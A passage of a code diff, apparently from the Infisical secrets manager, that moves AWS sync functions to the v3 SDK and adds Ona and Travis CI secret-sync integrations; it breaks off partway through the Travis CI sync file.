shouldManageTags: false, awsParameterStoreTagsRecord: {} }; } @@ -231,7 +249,7 @@ const processParameterTags = ({ syncTagsRecord: Record; awsTagsRecord: Record; }) => { - const tagsToAdd: SSM.TagList = []; + const tagsToAdd: Tag[] = []; const tagKeysToRemove: string[] = []; for (const syncEntry of Object.entries(syncTagsRecord)) { @@ -249,14 +267,14 @@ const processParameterTags = ({ }; const putParameter = async ( - ssm: SSM, - params: SSM.PutParameterRequest, + ssm: SSMClient, + params: PutParameterCommandInput, attempt = 0 -): Promise => { +): Promise => { try { - return await ssm.putParameter(params).promise(); + return await ssm.send(new PutParameterCommand(params)); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -267,14 +285,14 @@ const putParameter = async ( }; const addTagsToParameter = async ( - ssm: SSM, - params: Omit, + ssm: SSMClient, + params: Omit, attempt = 0 -): Promise => { +): Promise => { try { - return await ssm.addTagsToResource({ ...params, ResourceType: "Parameter" }).promise(); + return await ssm.send(new AddTagsToResourceCommand({ ...params, ResourceType: "Parameter" })); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -285,14 +303,14 @@ const addTagsToParameter = async ( }; const removeTagsFromParameter = async ( - ssm: SSM, - params: Omit, + ssm: SSMClient, + params: Omit, attempt = 0 -): Promise => { +): Promise => { try { - return await ssm.removeTagsFromResource({ ...params, ResourceType: "Parameter" }).promise(); + return await ssm.send(new RemoveTagsFromResourceCommand({ ...params, ResourceType: "Parameter" })); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -303,11 +321,11 @@ const removeTagsFromParameter = async ( }; const deleteParametersBatch = async ( - ssm: SSM, - parameters: SSM.Parameter[], + ssm: SSMClient, + parameters: Parameter[], attempt = 0 -): Promise => { - const results: SSM.DeleteParameterResult[] = []; +): Promise => { + const results: DeleteParametersCommandOutput[] = []; let remainingParams = [...parameters]; while (remainingParams.length > 0) { @@ -315,11 +333,11 @@ const deleteParametersBatch = async ( try { // eslint-disable-next-line no-await-in-loop - const result = await ssm.deleteParameters({ Names: batch.map((param) => param.Name!) }).promise(); + const result = await ssm.send(new DeleteParametersCommand({ Names: batch.map((param) => param.Name!) })); results.push(result); remainingParams = remainingParams.slice(BATCH_SIZE); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { // eslint-disable-next-line no-await-in-loop await sleep(); @@ -442,7 +460,7 @@ export const AwsParameterStoreSyncFns = { if (syncOptions.disableSecretDeletion) return { createdSecretKeys, updatedSecretKeys, deletedSecretKeys }; - const parametersToDelete: SSM.Parameter[] = []; + const parametersToDelete: Parameter[] = []; for (const entry of Object.entries(awsParameterStoreSecretsRecord)) { const [key, parameter] = entry; @@ -488,7 +506,7 @@ export const AwsParameterStoreSyncFns = { environment!.slug ); - const parametersToDelete: SSM.Parameter[] = []; + const parametersToDelete: Parameter[] = []; for (const entry of Object.entries(awsParameterStoreSecretsRecord)) { const [key, param] = entry; diff --git a/backend/src/services/secret-sync/aws-secrets-manager/aws-secrets-manager-sync-fns.ts b/backend/src/services/secret-sync/aws-secrets-manager/aws-secrets-manager-sync-fns.ts index e3dede45451..13a62beee78 100644 --- a/backend/src/services/secret-sync/aws-secrets-manager/aws-secrets-manager-sync-fns.ts +++ b/backend/src/services/secret-sync/aws-secrets-manager/aws-secrets-manager-sync-fns.ts @@ -1,29 +1,27 @@ -import { UntagResourceCommandOutput } from "@aws-sdk/client-kms"; import { BatchGetSecretValueCommand, CreateSecretCommand, - CreateSecretCommandInput, + type CreateSecretCommandInput, + type CreateSecretResponse, DeleteSecretCommand, - DeleteSecretResponse, + type DeleteSecretResponse, DescribeSecretCommand, - DescribeSecretCommandInput, + type DescribeSecretCommandInput, + type DescribeSecretResponse, ListSecretsCommand, + type SecretListEntry, SecretsManagerClient, + type SecretValueEntry, + type Tag, TagResourceCommand, - TagResourceCommandOutput, + type TagResourceCommandOutput, UntagResourceCommand, + type UntagResourceCommandOutput, UpdateSecretCommand, - UpdateSecretCommandInput + type UpdateSecretCommandInput } from "@aws-sdk/client-secrets-manager"; -import type { AWSError } from "aws-sdk"; -import { - CreateSecretResponse, - DescribeSecretResponse, - SecretListEntry, - SecretValueEntry, - Tag -} from "aws-sdk/clients/secretsmanager.js"; +import { isAwsError } from "@app/lib/aws/error"; import { CustomAWSHasher } from "@app/lib/aws/hashing"; import { crypto } from "@app/lib/crypto"; import { getAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-fns"; @@ -89,7 +87,7 @@ const getSecretsRecord = async ( hasNext = Boolean(output.NextToken); nextToken = output.NextToken; } catch (e) { - if ((e as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(e, "ThrottlingException") && attempt < MAX_RETRIES) { attempt += 1; // eslint-disable-next-line no-await-in-loop await sleep(); @@ -141,7 +139,7 @@ const getSecretValuesRecord = async ( hasNext = Boolean(output.NextToken); nextToken = output.NextToken; } catch (e) { - if ((e as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(e, "ThrottlingException") && attempt < MAX_RETRIES) { attempt += 1; // eslint-disable-next-line no-await-in-loop await sleep(); @@ -165,7 +163,7 @@ const describeSecret = async ( try { return await client.send(new DescribeSecretCommand(input)); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -205,7 +203,7 @@ const createSecret = async ( try { return await client.send(new CreateSecretCommand(input)); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -223,7 +221,7 @@ const updateSecret = async ( try { return await client.send(new UpdateSecretCommand(input)); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -241,7 +239,7 @@ const deleteSecret = async ( try { return await client.send(new DeleteSecretCommand({ SecretId: secretKey, ForceDeleteWithoutRecovery: true })); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -260,7 +258,7 @@ const addTags = async ( try { return await client.send(new TagResourceCommand({ SecretId: secretKey, Tags: tags })); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -279,7 +277,7 @@ const removeTags = async ( try { return await client.send(new UntagResourceCommand({ SecretId: secretKey, TagKeys: tagKeys })); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry diff --git a/backend/src/services/secret-sync/ona/index.ts b/backend/src/services/secret-sync/ona/index.ts new file mode 100644 index 00000000000..343955c8781 --- /dev/null +++ b/backend/src/services/secret-sync/ona/index.ts @@ -0,0 +1,5 @@ +export * from "./ona-sync-constants"; +export * from "./ona-sync-enums"; +export * from "./ona-sync-fns"; +export * from "./ona-sync-schemas"; +export * from "./ona-sync-types"; diff --git a/backend/src/services/secret-sync/ona/ona-sync-constants.ts b/backend/src/services/secret-sync/ona/ona-sync-constants.ts new file mode 100644 index 00000000000..bf1d32430c4 --- /dev/null +++ b/backend/src/services/secret-sync/ona/ona-sync-constants.ts @@ -0,0 +1,11 @@ +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { SecretSync } from "@app/services/secret-sync/secret-sync-enums"; +import { TSecretSyncListItem } from "@app/services/secret-sync/secret-sync-types"; + +export const ONA_SYNC_LIST_OPTION: TSecretSyncListItem = { + name: "Ona", + destination: SecretSync.Ona, + connection: AppConnection.Ona, + canImportSecrets: false, + canRemoveSecretsOnDeletion: true +}; diff --git a/backend/src/services/secret-sync/ona/ona-sync-enums.ts b/backend/src/services/secret-sync/ona/ona-sync-enums.ts new file mode 100644 index 00000000000..511d91d2c59 --- /dev/null +++ b/backend/src/services/secret-sync/ona/ona-sync-enums.ts @@ -0,0 +1 @@ +export const ONA_PAGE_SIZE = 100; diff --git a/backend/src/services/secret-sync/ona/ona-sync-fns.ts b/backend/src/services/secret-sync/ona/ona-sync-fns.ts new file mode 100644 index 00000000000..404d29c39cb --- /dev/null +++ b/backend/src/services/secret-sync/ona/ona-sync-fns.ts @@ -0,0 +1,183 @@ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { SecretSyncError } from "@app/services/secret-sync/secret-sync-errors"; +import { matchesSchema } from "@app/services/secret-sync/secret-sync-fns"; +import { TSecretMap } from "@app/services/secret-sync/secret-sync-types"; + +import { ONA_PAGE_SIZE } from "./ona-sync-enums"; +import { TOnaListSecretsResponse, TOnaSecret, TOnaSyncWithCredentials } from "./ona-sync-types"; + +const ONA_LIST_SECRETS_PATH = "/gitpod.v1.SecretService/ListSecrets"; +const ONA_CREATE_SECRET_PATH = "/gitpod.v1.SecretService/CreateSecret"; +const ONA_UPDATE_SECRET_VALUE_PATH = "/gitpod.v1.SecretService/UpdateSecretValue"; +const ONA_DELETE_SECRET_PATH = "/gitpod.v1.SecretService/DeleteSecret"; + +const ONA_MAX_RETRIES = 3; +const ONA_BASE_RETRY_DELAY_MS = 500; + +const ONA_API_URL = "https://app.gitpod.io/api"; + +const sleep = (ms: number) => + new Promise((resolve) => { + setTimeout(resolve, ms); + }); + +const isRetryableOnaError = (error: unknown): boolean => { + if (!(error instanceof AxiosError)) return false; + if (!error.response) return true; + const { status } = error.response; + return status === 429; +}; + +const withOnaRetry = async (fn: () => Promise): Promise => { + for (let attempt = 0; ; attempt += 1) { + try { + // eslint-disable-next-line no-await-in-loop + return await fn(); + } catch (error) { + if (attempt >= ONA_MAX_RETRIES || !isRetryableOnaError(error)) throw error; + // eslint-disable-next-line no-await-in-loop + await sleep(ONA_BASE_RETRY_DELAY_MS * 2 ** attempt); + } + } +}; + +const getAuthHeaders = (secretSync: TOnaSyncWithCredentials) => ({ + Authorization: `Bearer ${secretSync.connection.credentials.personalAccessToken}`, + "Content-Type": "application/json" +}); + +const listEnvVarSecrets = async (secretSync: TOnaSyncWithCredentials): Promise => { + const all: TOnaSecret[] = []; + let token: string | undefined; + let hasMore = true; + + while (hasMore) { + // eslint-disable-next-line no-await-in-loop, @typescript-eslint/no-loop-func + const { data } = await withOnaRetry(async () => { + return request.post( + `${ONA_API_URL}${ONA_LIST_SECRETS_PATH}`, + { + filter: { scope: { projectId: secretSync.destinationConfig.projectId } }, + pagination: { pageSize: ONA_PAGE_SIZE, ...(token ? { token } : {}) } + }, + { headers: getAuthHeaders(secretSync) } + ); + }); + + if (data?.secrets?.length) all.push(...data.secrets); + + token = data?.pagination?.nextToken || undefined; + hasMore = Boolean(token); + } + + return all.filter((secret) => secret.environmentVariable === true); +}; + +const createEnvVarSecret = async (secretSync: TOnaSyncWithCredentials, name: string, value: string): Promise => { + await withOnaRetry(async () => { + return request.post( + `${ONA_API_URL}${ONA_CREATE_SECRET_PATH}`, + { + name, + value, + scope: { projectId: secretSync.destinationConfig.projectId }, + environmentVariable: true + }, + { headers: getAuthHeaders(secretSync) } + ); + }); +}; + +const updateSecretValue = async ( + secretSync: TOnaSyncWithCredentials, + secretId: string, + value: string +): Promise => { + await withOnaRetry(async () => { + return request.post( + `${ONA_API_URL}${ONA_UPDATE_SECRET_VALUE_PATH}`, + { secretId, value }, + { headers: getAuthHeaders(secretSync) } + ); + }); +}; + +const deleteSecret = async (secretSync: TOnaSyncWithCredentials, secretId: string): Promise => { + await withOnaRetry(async () => { + return request.post( + `${ONA_API_URL}${ONA_DELETE_SECRET_PATH}`, + { secretId }, + { headers: getAuthHeaders(secretSync) } + ); + }); +}; + +export const OnaSyncFns = { + syncSecrets: async (secretSync: TOnaSyncWithCredentials, secretMap: TSecretMap) => { + const existingSecrets = await listEnvVarSecrets(secretSync); + const existingByName = new Map(existingSecrets.map((s) => [s.name, s])); + + for (const key of Object.keys(secretMap)) { + const prior = existingByName.get(key); + try { + if (!prior) { + // eslint-disable-next-line no-await-in-loop + await createEnvVarSecret(secretSync, key, secretMap[key].value); + } else { + // eslint-disable-next-line no-await-in-loop + await updateSecretValue(secretSync, prior.id, secretMap[key].value); + } + } catch (error) { + if (error instanceof SecretSyncError) throw error; + throw new SecretSyncError({ error, secretKey: key }); + } + } + + if (secretSync.syncOptions.disableSecretDeletion) return; + + for (const existing of existingSecrets) { + if (!matchesSchema(existing.name, secretSync.environment?.slug || "", secretSync.syncOptions.keySchema)) { + // eslint-disable-next-line no-continue + continue; + } + if (secretMap[existing.name]) { + // eslint-disable-next-line no-continue + continue; + } + try { + // eslint-disable-next-line no-await-in-loop + await deleteSecret(secretSync, existing.id); + } catch (error) { + if (error instanceof SecretSyncError) throw error; + throw new SecretSyncError({ error, secretKey: existing.name }); + } + } + }, + + getSecrets: async (): Promise => { + // Ona's GetSecretValue endpoint only returns values from within an active workspace/environment, + // so importing secret values from outside a workspace is not possible with a PAT. Import is + // intentionally disabled (canImportSecrets: false on the schema/list-item). + throw new Error("Ona does not support importing secrets."); + }, + + removeSecrets: async (secretSync: TOnaSyncWithCredentials, secretMap: TSecretMap) => { + const existingSecrets = await listEnvVarSecrets(secretSync); + + for (const existing of existingSecrets) { + if (!(existing.name in secretMap)) { + // eslint-disable-next-line no-continue + continue; + } + try { + // eslint-disable-next-line no-await-in-loop + await deleteSecret(secretSync, existing.id); + } catch (error) { + if (error instanceof SecretSyncError) throw error; + throw new SecretSyncError({ error, secretKey: existing.name }); + } + } + } +}; diff --git a/backend/src/services/secret-sync/ona/ona-sync-schemas.ts b/backend/src/services/secret-sync/ona/ona-sync-schemas.ts new file mode 100644 index 00000000000..34ac6e4d5bc --- /dev/null +++ b/backend/src/services/secret-sync/ona/ona-sync-schemas.ts @@ -0,0 +1,49 @@ +import { z } from "zod"; + +import { SecretSyncs } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { SecretSync } from "@app/services/secret-sync/secret-sync-enums"; +import { + BaseSecretSyncSchema, + GenericCreateSecretSyncFieldsSchema, + GenericUpdateSecretSyncFieldsSchema +} from "@app/services/secret-sync/secret-sync-schemas"; +import { TSyncOptionsConfig } from "@app/services/secret-sync/secret-sync-types"; + +import { SECRET_SYNC_NAME_MAP } from "../secret-sync-maps"; + +const OnaSyncDestinationConfigSchema = z.object({ + projectId: z + .string() + .trim() + .min(1, "Ona project ID is required") + .describe(SecretSyncs.DESTINATION_CONFIG.ONA.projectId), + projectName: z.string().trim().optional().describe(SecretSyncs.DESTINATION_CONFIG.ONA.projectName) +}); + +const OnaSyncOptionsConfig: TSyncOptionsConfig = { canImportSecrets: false }; + +export const OnaSyncSchema = BaseSecretSyncSchema(SecretSync.Ona, OnaSyncOptionsConfig) + .extend({ + destination: z.literal(SecretSync.Ona), + destinationConfig: OnaSyncDestinationConfigSchema + }) + .describe(JSON.stringify({ title: SECRET_SYNC_NAME_MAP[SecretSync.Ona] })); + +export const CreateOnaSyncSchema = GenericCreateSecretSyncFieldsSchema(SecretSync.Ona, OnaSyncOptionsConfig).extend({ + destinationConfig: OnaSyncDestinationConfigSchema +}); + +export const UpdateOnaSyncSchema = GenericUpdateSecretSyncFieldsSchema(SecretSync.Ona, OnaSyncOptionsConfig).extend({ + destinationConfig: OnaSyncDestinationConfigSchema.optional() +}); + +export const OnaSyncListItemSchema = z + .object({ + name: z.literal("Ona"), + connection: z.literal(AppConnection.Ona), + destination: z.literal(SecretSync.Ona), + canImportSecrets: z.literal(false), + canRemoveSecretsOnDeletion: z.literal(true) + }) + .describe(JSON.stringify({ title: SECRET_SYNC_NAME_MAP[SecretSync.Ona] })); diff --git a/backend/src/services/secret-sync/ona/ona-sync-types.ts b/backend/src/services/secret-sync/ona/ona-sync-types.ts new file mode 100644 index 00000000000..a88be68ba9c --- /dev/null +++ b/backend/src/services/secret-sync/ona/ona-sync-types.ts @@ -0,0 +1,38 @@ +import { z } from "zod"; + +import { TOnaConnection } from "@app/services/app-connection/ona"; + +import { CreateOnaSyncSchema, OnaSyncListItemSchema, OnaSyncSchema } from "./ona-sync-schemas"; + +export type TOnaSync = z.infer; + +export type TOnaSyncInput = z.infer; + +export type TOnaSyncListItem = z.infer; + +export type TOnaSyncWithCredentials = TOnaSync & { + connection: TOnaConnection; +}; + +export type TOnaSecret = { + id: string; + name: string; + environmentVariable?: boolean; + scope?: { + projectId?: string; + userId?: string; + organizationId?: string; + serviceAccountId?: string; + }; +}; + +export type TOnaListSecretsResponse = { + secrets?: TOnaSecret[]; + pagination?: { + nextToken?: string; + }; +}; + +export type TOnaGetSecretValueResponse = { + value?: string; +}; diff --git a/backend/src/services/secret-sync/secret-sync-enums.ts b/backend/src/services/secret-sync/secret-sync-enums.ts index 92dbd907fa9..580cb08bcfe 100644 --- a/backend/src/services/secret-sync/secret-sync-enums.ts +++ b/backend/src/services/secret-sync/secret-sync-enums.ts @@ -35,7 +35,9 @@ export enum SecretSync { OctopusDeploy = "octopus-deploy", CircleCI = "circleci", AzureEntraIdScim = "azure-entra-id-scim", - ExternalInfisical = "external-infisical" + ExternalInfisical = "external-infisical", + Ona = "ona", + TravisCI = "travis-ci" } export enum SecretSyncInitialSyncBehavior { diff --git a/backend/src/services/secret-sync/secret-sync-fns.ts b/backend/src/services/secret-sync/secret-sync-fns.ts index cfd34bf4cad..37d9be5007c 100644 --- a/backend/src/services/secret-sync/secret-sync-fns.ts +++ b/backend/src/services/secret-sync/secret-sync-fns.ts @@ -69,6 +69,7 @@ import { LARAVEL_FORGE_SYNC_LIST_OPTION, LaravelForgeSyncFns } from "./laravel-f import { NETLIFY_SYNC_LIST_OPTION, NetlifySyncFns } from "./netlify"; import { NORTHFLANK_SYNC_LIST_OPTION, NorthflankSyncFns } from "./northflank"; import { OCTOPUS_DEPLOY_SYNC_LIST_OPTION, OctopusDeploySyncFns } from "./octopus-deploy"; +import { ONA_SYNC_LIST_OPTION, OnaSyncFns } from "./ona"; import { RAILWAY_SYNC_LIST_OPTION } from "./railway/railway-sync-constants"; import { RailwaySyncFns } from "./railway/railway-sync-fns"; import { RENDER_SYNC_LIST_OPTION, RenderSyncFns } from "./render"; @@ -76,6 +77,7 @@ import { SECRET_SYNC_PLAN_MAP } from "./secret-sync-maps"; import { SUPABASE_SYNC_LIST_OPTION, SupabaseSyncFns } from "./supabase"; import { TEAMCITY_SYNC_LIST_OPTION, TeamCitySyncFns } from "./teamcity"; import { TERRAFORM_CLOUD_SYNC_LIST_OPTION, TerraformCloudSyncFns } from "./terraform-cloud"; +import { TRAVIS_CI_SYNC_LIST_OPTION, TravisCISyncFns } from "./travis-ci"; import { VERCEL_SYNC_LIST_OPTION, VercelSyncFns } from "./vercel"; import { WINDMILL_SYNC_LIST_OPTION, WindmillSyncFns } from "./windmill"; import { ZABBIX_SYNC_LIST_OPTION, ZabbixSyncFns } from "./zabbix"; @@ -117,7 +119,9 @@ const SECRET_SYNC_LIST_OPTIONS: Record = { [SecretSync.OctopusDeploy]: OCTOPUS_DEPLOY_SYNC_LIST_OPTION, [SecretSync.CircleCI]: CIRCLECI_SYNC_LIST_OPTION, [SecretSync.AzureEntraIdScim]: AZURE_ENTRA_ID_SCIM_SYNC_LIST_OPTION, - [SecretSync.ExternalInfisical]: EXTERNAL_INFISICAL_SYNC_LIST_OPTION + [SecretSync.ExternalInfisical]: EXTERNAL_INFISICAL_SYNC_LIST_OPTION, + [SecretSync.Ona]: ONA_SYNC_LIST_OPTION, + [SecretSync.TravisCI]: TRAVIS_CI_SYNC_LIST_OPTION }; export const listSecretSyncOptions = () => { @@ -378,6 +382,10 @@ export const SecretSyncFns = { // Key schema is intentionally not applied for Infisical-to-Infisical syncs to prevent // infinite sync loops where the prefixed key triggers another sync cycle. return ExternalInfisicalSyncFns.syncSecrets(secretSync, secretMap); + case SecretSync.Ona: + return OnaSyncFns.syncSecrets(secretSync, schemaSecretMap); + case SecretSync.TravisCI: + return TravisCISyncFns.syncSecrets(secretSync, schemaSecretMap); default: throw new Error( `Unhandled sync destination for sync secrets fns: ${(secretSync as TSecretSyncWithCredentials).destination}` @@ -518,6 +526,12 @@ export const SecretSyncFns = { case SecretSync.ExternalInfisical: secretMap = await ExternalInfisicalSyncFns.getSecrets(secretSync); break; + case SecretSync.Ona: + secretMap = await OnaSyncFns.getSecrets(); + break; + case SecretSync.TravisCI: + secretMap = await TravisCISyncFns.getSecrets(secretSync); + break; default: throw new Error( `Unhandled sync destination for get secrets fns: ${(secretSync as TSecretSyncWithCredentials).destination}` @@ -627,6 +641,10 @@ export const SecretSyncFns = { // Key schema is intentionally not applied for Infisical-to-Infisical syncs to prevent // infinite sync loops where the prefixed key triggers another sync cycle. return ExternalInfisicalSyncFns.removeSecrets(secretSync, secretMap); + case SecretSync.Ona: + return OnaSyncFns.removeSecrets(secretSync, schemaSecretMap); + case SecretSync.TravisCI: + return TravisCISyncFns.removeSecrets(secretSync, schemaSecretMap); default: throw new Error( `Unhandled sync destination for remove secrets fns: ${(secretSync as TSecretSyncWithCredentials).destination}` diff --git a/backend/src/services/secret-sync/secret-sync-maps.ts b/backend/src/services/secret-sync/secret-sync-maps.ts index 9fe6f036422..6acd04a1c0e 100644 --- a/backend/src/services/secret-sync/secret-sync-maps.ts +++ b/backend/src/services/secret-sync/secret-sync-maps.ts @@ -39,7 +39,9 @@ export const SECRET_SYNC_NAME_MAP: Record = { [SecretSync.OctopusDeploy]: "Octopus Deploy", [SecretSync.CircleCI]: "CircleCI", [SecretSync.AzureEntraIdScim]: "Azure Entra ID SCIM", - [SecretSync.ExternalInfisical]: "Infisical" + [SecretSync.ExternalInfisical]: "Infisical", + [SecretSync.Ona]: "Ona", + [SecretSync.TravisCI]: "Travis CI" }; export const SECRET_SYNC_CONNECTION_MAP: Record = { @@ -79,7 +81,9 @@ export const SECRET_SYNC_CONNECTION_MAP: Record = { [SecretSync.OctopusDeploy]: AppConnection.OctopusDeploy, [SecretSync.CircleCI]: AppConnection.CircleCI, [SecretSync.AzureEntraIdScim]: AppConnection.AzureEntraId, - [SecretSync.ExternalInfisical]: AppConnection.ExternalInfisical + [SecretSync.ExternalInfisical]: AppConnection.ExternalInfisical, + [SecretSync.Ona]: AppConnection.Ona, + [SecretSync.TravisCI]: AppConnection.TravisCI }; export const SECRET_SYNC_PLAN_MAP: Record = { @@ -119,7 +123,9 @@ export const SECRET_SYNC_PLAN_MAP: Record = { [SecretSync.OctopusDeploy]: SecretSyncPlanType.Regular, [SecretSync.CircleCI]: SecretSyncPlanType.Regular, [SecretSync.AzureEntraIdScim]: SecretSyncPlanType.Regular, - [SecretSync.ExternalInfisical]: SecretSyncPlanType.Regular + [SecretSync.ExternalInfisical]: SecretSyncPlanType.Regular, + [SecretSync.Ona]: SecretSyncPlanType.Regular, + [SecretSync.TravisCI]: SecretSyncPlanType.Regular }; export const SECRET_SYNC_SKIP_FIELDS_MAP: Record = { @@ -168,7 +174,9 @@ export const SECRET_SYNC_SKIP_FIELDS_MAP: Record = { [SecretSync.OctopusDeploy]: [], [SecretSync.CircleCI]: [], [SecretSync.AzureEntraIdScim]: [], - [SecretSync.ExternalInfisical]: [] + [SecretSync.ExternalInfisical]: [], + [SecretSync.Ona]: ["projectName"], + [SecretSync.TravisCI]: ["repositorySlug"] }; const defaultDuplicateCheck: DestinationDuplicateCheckFn = () => true; @@ -234,7 +242,9 @@ export const DESTINATION_DUPLICATE_CHECK_MAP: Record; kmsService: Pick; permissionService: Pick; - projectDAL: Pick; orgDAL: Pick; projectBotService: Pick; folderDAL: Pick; @@ -86,7 +86,6 @@ export const secretSyncServiceFactory = ({ appConnectionService, kmsService, permissionService, - projectDAL, orgDAL, projectBotService, secretSyncQueue, @@ -360,12 +359,11 @@ export const secretSyncServiceFactory = ({ message: `Could not find folder with path "${secretPath}" in environment "${environment}" for project with ID "${projectId}"` }); - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ message: "Project not found" }); - } - - const organization = await orgDAL.findById(project.orgId); + // getProjectPermission above throws NotFoundError if the project doesn't exist and + // guarantees actor.orgId === project.orgId β€” no separate project lookup needed. + const organization = await requestMemoize(requestMemoKeys.orgFindById(actor.orgId), () => + orgDAL.findById(actor.orgId) + ); if (organization?.blockDuplicateSecretSyncDestinations) { const duplicateCheck = await checkDuplicateDestination( { @@ -494,11 +492,11 @@ export const secretSyncServiceFactory = ({ let { folderId } = secretSync; if (params.destinationConfig) { - const project = await projectDAL.findById(secretSync.projectId); - if (!project) { - throw new NotFoundError({ message: "Project not found" }); - } - const organization = await orgDAL.findById(project.orgId); + // getProjectPermission above throws NotFoundError if the project doesn't exist and + // guarantees actor.orgId === project.orgId β€” no separate project lookup needed. + const organization = await requestMemoize(requestMemoKeys.orgFindById(actor.orgId), () => + orgDAL.findById(actor.orgId) + ); if (organization?.blockDuplicateSecretSyncDestinations) { const duplicateCheck = await checkDuplicateDestination( diff --git a/backend/src/services/secret-sync/secret-sync-types.ts b/backend/src/services/secret-sync/secret-sync-types.ts index dc2df1e2bc9..7252f901b7f 100644 --- a/backend/src/services/secret-sync/secret-sync-types.ts +++ b/backend/src/services/secret-sync/secret-sync-types.ts @@ -158,6 +158,7 @@ import { TOctopusDeploySyncListItem, TOctopusDeploySyncWithCredentials } from "./octopus-deploy"; +import { TOnaSync, TOnaSyncInput, TOnaSyncListItem, TOnaSyncWithCredentials } from "./ona"; import { TRailwaySync, TRailwaySyncInput, @@ -188,6 +189,7 @@ import { TTerraformCloudSyncListItem, TTerraformCloudSyncWithCredentials } from "./terraform-cloud"; +import { TTravisCISync, TTravisCISyncInput, TTravisCISyncListItem, TTravisCISyncWithCredentials } from "./travis-ci"; import { TVercelSync, TVercelSyncInput, TVercelSyncListItem, TVercelSyncWithCredentials } from "./vercel"; import { TZabbixSync, TZabbixSyncInput, TZabbixSyncListItem, TZabbixSyncWithCredentials } from "./zabbix"; @@ -227,7 +229,9 @@ export type TSecretSync = | TOctopusDeploySync | TCircleCISync | TAzureEntraIdScimSync - | TExternalInfisicalSync; + | TExternalInfisicalSync + | TOnaSync + | TTravisCISync; export type TSecretSyncWithCredentials = | TAwsParameterStoreSyncWithCredentials @@ -266,7 +270,9 @@ export type TSecretSyncWithCredentials = | TOctopusDeploySyncWithCredentials | TCircleCISyncWithCredentials | TAzureEntraIdScimSyncWithCredentials - | TExternalInfisicalSyncWithCredentials; + | TExternalInfisicalSyncWithCredentials + | TOnaSyncWithCredentials + | TTravisCISyncWithCredentials; export type TSecretSyncInput = | TAwsParameterStoreSyncInput @@ -305,7 +311,9 @@ export type TSecretSyncInput = | TOctopusDeploySyncInput | TCircleCISyncInput | TAzureEntraIdScimSyncInput - | TExternalInfisicalSyncInput; + | TExternalInfisicalSyncInput + | TOnaSyncInput + | TTravisCISyncInput; export type TSecretSyncListItem = | TAwsParameterStoreSyncListItem @@ -344,7 +352,9 @@ export type TSecretSyncListItem = | TOctopusDeploySyncListItem | TCircleCISyncListItem | TAzureEntraIdScimSyncListItem - | TExternalInfisicalSyncListItem; + | TExternalInfisicalSyncListItem + | TOnaSyncListItem + | TTravisCISyncListItem; export type TSyncOptionsConfig = { canImportSecrets: boolean; diff --git a/backend/src/services/secret-sync/travis-ci/index.ts b/backend/src/services/secret-sync/travis-ci/index.ts new file mode 100644 index 00000000000..b38ee2d27d4 --- /dev/null +++ b/backend/src/services/secret-sync/travis-ci/index.ts @@ -0,0 +1,4 @@ +export * from "./travis-ci-sync-constants"; +export * from "./travis-ci-sync-fns"; +export * from "./travis-ci-sync-schemas"; +export * from "./travis-ci-sync-types"; diff --git a/backend/src/services/secret-sync/travis-ci/travis-ci-sync-constants.ts b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-constants.ts new file mode 100644 index 00000000000..e78e4b13247 --- /dev/null +++ b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-constants.ts @@ -0,0 +1,11 @@ +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { SecretSync } from "@app/services/secret-sync/secret-sync-enums"; +import { TSecretSyncListItem } from "@app/services/secret-sync/secret-sync-types"; + +export const TRAVIS_CI_SYNC_LIST_OPTION: TSecretSyncListItem = { + name: "Travis CI", + destination: SecretSync.TravisCI, + connection: AppConnection.TravisCI, + canRemoveSecretsOnDeletion: true, + canImportSecrets: false +}; diff --git a/backend/src/services/secret-sync/travis-ci/travis-ci-sync-fns.ts b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-fns.ts new file mode 100644 index 00000000000..77022b5ec0e --- /dev/null +++ b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-fns.ts @@ -0,0 +1,222 @@ +/* eslint-disable no-await-in-loop */ +/* eslint-disable no-continue */ +import { isAxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { IntegrationUrls } from "@app/services/integration-auth/integration-list"; +import { SecretSyncError } from "@app/services/secret-sync/secret-sync-errors"; +import { matchesSchema } from "@app/services/secret-sync/secret-sync-fns"; +import { TSecretMap } from "@app/services/secret-sync/secret-sync-types"; + +import { 